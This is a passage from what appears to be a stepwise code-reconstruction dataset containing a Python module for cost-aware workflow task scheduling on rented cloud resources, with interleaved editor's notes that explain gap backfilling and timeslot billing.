arrival_time=arrival_time)\n if eft_best == -1 or eft_task < eft_best:\n (est_best, eft_best, runtime_on_resource_best,\n 
place_id_best, resource_id_best) = (max_est_of_task,\n eft_task, task_runtime_on_resource, place_id, r)\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best)\n\n def get_fastest_empty_resource(self):\n for r in range(self.len - 1, -1, -1):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = 
timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < 
eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = 
self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
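
Editor's note: step-3 reveals find_gap, the first-fit search that backfills a task into an idle gap on a resource. The sketch below reproduces the same search over plain (start, finish) pairs; it is an illustrative standalone helper, not the class method, and it returns an explicit append index instead of the module's -1 sentinel.

def find_gap(busy, ready_time, runtime):
    # busy: non-overlapping (est, eft) pairs sorted by start time.
    if not busy:
        return ready_time, 0
    if busy[0][0] >= ready_time + runtime:
        return ready_time, 0                      # fits before the first task
    for i in range(1, len(busy)):
        gap_start = max(busy[i - 1][1], ready_time)
        if busy[i][0] - gap_start >= runtime:
            return gap_start, i                   # fits between tasks i-1 and i
    return max(busy[-1][1], ready_time), len(busy)    # append at the end

busy = [(0, 4), (10, 12)]
print(find_gap(busy, 2, 3))   # (4, 1): the [4, 10) idle gap holds 3 units
print(find_gap(busy, 2, 7))   # (12, 2): no internal gap is wide enough
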
"step-4": "<mask token>\n\n\nclass Constraint(Enum):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass TaskSchedule:\n\n def __init__(self, task, est=-1, runtime=-1, eft=-1, resource=-1):\n self.task = task\n self.EFT = eft\n self.EST = est\n self.runtime = runtime\n self.resource = resource\n\n\nclass Resources(object):\n len = -1\n bandwidth = 0\n\n def __init__(self, powers, bandwidth):\n number_of_resources = len(powers)\n self.power = powers\n self.tasksOfResource = []\n for i in range(number_of_resources):\n self.tasksOfResource.append([])\n self.len = number_of_resources\n self.bandwidth = bandwidth\n self.job_task_schedule = {}\n\n def find_gap(self, resource, start_time, runtime):\n \"\"\"\n finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource\n if resource is -1, it does nothing (returns the given start time, and -1 for place)\n \"\"\"\n if resource == -1:\n return start_time, -1\n number_of_tasks = len(self.tasksOfResource[resource])\n if number_of_tasks == 0:\n return start_time, 0\n elif self.tasksOfResource[resource][0].EST >= start_time + runtime:\n return start_time, 0\n elif number_of_tasks == 1:\n if self.tasksOfResource[resource][0].EFT < start_time:\n return start_time, 1\n else:\n return self.tasksOfResource[resource][0].EFT, 1\n else:\n for i in range(1, number_of_tasks):\n if self.tasksOfResource[resource][i].EST <= start_time:\n continue\n elif start_time < self.tasksOfResource[resource][i - 1].EFT:\n gap = self.tasksOfResource[resource][i\n ].EST - self.tasksOfResource[resource][i - 1].EFT\n if gap < runtime:\n continue\n else:\n return self.tasksOfResource[resource][i - 1].EFT, i\n elif self.tasksOfResource[resource][i - 1\n ].EFT <= start_time < self.tasksOfResource[resource][i\n ].EST:\n if self.tasksOfResource[resource][i\n ].EST - start_time < runtime:\n continue\n else:\n return start_time, i\n else:\n return max(self.tasksOfResource[resource][-1].EFT, start_time\n ), -1\n\n def calculate_eft(self, task, resource_id, arrival_time=0):\n g = task.graph\n if resource_id == -1:\n graphs_task_on_resource = []\n task_runtime_on_resource = task.weight / max(self.power)\n else:\n task_runtime_on_resource = task.weight / self.power[resource_id]\n graphs_task_on_resource = list(map(lambda t: t.task.id if t.\n task.graph.name == g.name else -1, self.tasksOfResource[\n resource_id]))\n max_est_of_task = arrival_time\n for p in task.predecessor:\n if p in graphs_task_on_resource:\n communication_delay = 0\n else:\n communication_delay = task.predecessor[p] / self.bandwidth\n if (g.name not in self.job_task_schedule or p not in self.\n job_task_schedule[g.name]):\n continue\n p_eft = self.job_task_schedule[g.name][p].EFT\n if p_eft + communication_delay > max_est_of_task:\n max_est_of_task = p_eft + communication_delay\n start_time, place_id = self.find_gap(resource_id, max_est_of_task,\n task_runtime_on_resource)\n eft_task = start_time + task_runtime_on_resource\n return start_time, eft_task, task_runtime_on_resource, place_id\n\n def schedule(self, task_schedule, place_id=-1):\n \"\"\"\n Schedules a task in a place id. 
if place_id is -1 the schedule is appended to the last.\n :type task_schedule: TaskSchedule\n :type place_id: int\n \"\"\"\n resource = task_schedule.resource\n if place_id == -1:\n self.tasksOfResource[resource].append(task_schedule)\n else:\n self.tasksOfResource[resource].insert(place_id, task_schedule)\n if task_schedule.task.graph.name in self.job_task_schedule:\n pass\n else:\n self.job_task_schedule[task_schedule.task.graph.name] = {}\n self.job_task_schedule[task_schedule.task.graph.name][task_schedule\n .task.id] = task_schedule\n\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\n result = []\n for r in range(0, self.len):\n names = []\n est = []\n eft = []\n\n def add_entries(x):\n if job_id != -1 and x.task.graph.name != job_id:\n return\n names.append(x.task.id if job_id != -1 else\n f'{x.task.graph.name}-{x.task.id}')\n est.append(x.EST)\n eft.append(x.EFT)\n list(map(add_entries, self.tasksOfResource[r]))\n result.append((names, est, eft))\n\n def print_list(x):\n if not print_enabled:\n return\n first = True\n for e in x:\n if first:\n first = False\n else:\n print(',', end=' ')\n print(e, end=' ')\n print()\n print_list(names)\n print_list(est)\n print_list(eft)\n if finishing is not None and print_enabled:\n print(finishing)\n return result\n\n def write_schedule(self, db_file, test_name='N/A', extra='single',\n policy='', job_count=1):\n w = writer.Writer(db_file)\n w.create_plan()\n w.create_plan_head()\n unique_jobs_id = w.write_plan_head(test_name, policy, job_count)\n\n def add_entries(x):\n (job_name, job_type, task_id, jobs_id, start_time, finish_time,\n resource_id, resource_speed, job_component_id, extra_params\n ) = (x.task.graph.name, x.task.graph.type, x.task.id,\n unique_jobs_id, x.EST, x.EFT, r, self.power[r], policy, extra)\n w.write_plan(job_name, job_type, task_id, jobs_id, start_time,\n finish_time, resource_id, resource_speed, job_component_id,\n extra_params)\n for r in range(0, self.len):\n list(map(add_entries, self.tasksOfResource[r]))\n w.commit()\n w.close()\n\n @property\n def average_power(self):\n return math.fsum(self.power) / self.len\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n\n def sum_gaps_resource(self, resource_id):\n tasks_in_current_resource = self.tasksOfResource[resource_id]\n num_tasks = len(tasks_in_current_resource)\n if num_tasks <= 1:\n return 0\n sum_gaps = 0\n for i in range(1, num_tasks):\n if tasks_in_current_resource[i - 1\n ].task.dummy_task or tasks_in_current_resource[i\n ].task.dummy_task:\n continue\n finish_prev = tasks_in_current_resource[i - 1].EFT\n start_current = tasks_in_current_resource[i].EST\n gap_length = start_current - finish_prev\n if gap_length < 0:\n raise Exception('Schedule is not correct, check gaps!')\n sum_gaps += gap_length\n return sum_gaps\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n\n def select_resource(self, task, arrival_time=0):\n (est_best, eft_best, runtime_on_resource_best, place_id_best,\n resource_id_best) = -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (max_est_of_task, eft_task, task_runtime_on_resource, place_id\n ) = self.calculate_eft(task, r, arrival_time=arrival_time)\n if eft_best == -1 or eft_task < eft_best:\n (est_best, eft_best, runtime_on_resource_best,\n 
place_id_best, resource_id_best) = (max_est_of_task,\n eft_task, task_runtime_on_resource, place_id, r)\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best)\n\n def get_fastest_empty_resource(self):\n for r in range(self.len - 1, -1, -1):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = 
timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < 
eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = 
self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
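
Editor's note: the rent-period loop inside resource_cost (fully visible from this step on) bills whole timeslots per rental period instead of one reservation spanning the first start to the last finish, so long idle stretches between tasks are not paid for. A self-contained sketch of that billing rule follows; billed_cost is an illustrative name, and the inputs are assumed to be non-empty, sorted start/finish lists.

import math

def billed_cost(startof, endof, timeslot, price):
    # startof/endof: task start and finish times on one resource, sorted.
    periods, i = [], 0
    period_start = startof[0]
    while i < len(startof):
        # Pay up to a timeslot boundary at or after task i's finish time.
        used = endof[i] - period_start
        paid_end = endof[i] + (timeslot - used % timeslot) % timeslot
        i += 1
        if i >= len(startof) or startof[i] > paid_end:
            periods.append((period_start, paid_end))
            if i < len(startof):
                period_start = startof[i]    # next task opens a new period
    rented = sum(e - s for s, e in periods)
    return rented / timeslot * price

# Tasks [0, 3) and [20, 25) with a 10-unit timeslot rent [0, 10) and
# [20, 30): 2 timeslots are billed, not ceil(25 / 10) = 3 for the full span.
print(billed_cost([0, 20], [3, 25], timeslot=10, price=1.0))  # 2.0
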
